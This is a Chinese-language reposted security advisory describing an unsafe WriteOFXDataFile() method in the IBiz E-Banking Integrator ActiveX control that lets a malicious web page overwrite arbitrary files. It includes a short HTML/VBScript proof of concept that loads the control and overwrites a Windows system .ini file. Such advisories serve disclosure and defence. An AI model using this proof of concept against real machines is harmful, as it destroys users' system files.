专业网站运营平台
首页 网络安全 漏洞分析 正文
我要投稿

IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安全调用漏洞

漏洞分析
2023-12-04 0 689

受影响系统:

/n software IBiz E-Banking Integrator 2.0

描述:

——————————————————————————–

BUGTRAQ ID: 28700

IBiz E-Banking Integrator是用于从银行、投资公司等帐号访问财务交易信息的解决方案。

IBiz E-Banking Integrator所提供的IBizEBank.FIProfile.1 ActiveX控件(fiprofile20.ocx)没有正确地处理对WriteOFXDataFile()方式的调用,如果用户受骗访问了恶意网页的话,就可能导致以当前登录用户的权限覆盖和破坏系统上的任意文件。

<*来源:shinnai (shinnai@autistici.org)

链接:http://secunia.com/advisories/29758/

*>

测试方法:

——————————————————————————–

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<object classid=\’clsid:24445430-F789-11CE-86F8-0020AFD8C6DB\’ id=\’test\’></object>

<input language=VBScript onclick=tryMe() type=button value=\’Click here to start the test\’>

<script language=\’vbscript\’>

Sub tryMe()

On Error Resume Next

test.WriteOFXDataFile "C:\\WINDOWS\\system_.ini"

If Err.Number <> 0 Then

MsgBox "Something went wrong!"

Else

MsgBox "Exploit Completed!"

End If

End Sub

</script>

建议:

——————————————————————————–

厂商补丁:

/n software

———–

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.nsoftware.com/ibiz/ebank/default.aspx

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 漏洞分析 IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安全调用漏洞 https://www.u-9.cn/security/fenxi/72364.html

IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安全调用漏洞
上一篇: EMC DiskXtender文件系统管理器远程栈溢出漏洞
IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安全调用漏洞
下一篇: Cisco 操作系统IOS存在DLSw拒绝服务漏洞
常见问题

相关文章

Velocity Parse()函数引发的本地包含漏洞及利用方法
Velocity Parse()函数引发的本地包含漏洞及利用方法
漏洞分析
5个月前 363
查找Centos Linux服务器上入侵者的WebShell后门
查找Centos Linux服务器上入侵者的WebShell后门
漏洞分析
5个月前 1,124
微软\”后门\”ntsd的发现与清除
微软\”后门\”ntsd的发现与清除
漏洞分析
5个月前 352
WEBSHELL箱子系统V1.0收信箱子代码漏洞分析及解决方法
WEBSHELL箱子系统V1.0收信箱子代码漏洞分析及解决方法
漏洞分析
5个月前 713
猜你喜欢
发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务

联系官方团队 在线提交工单
TA的动态
总裁主题

分享最新WordPress教程共同学习,共同进步,共同成长!

QQ交流群
悠久资源

QQ交流群

您的支持,是我们最大的动力!
热门文章
热门评论
终身VIP会员限时钜惠
首页 首页 菜单 首页 首页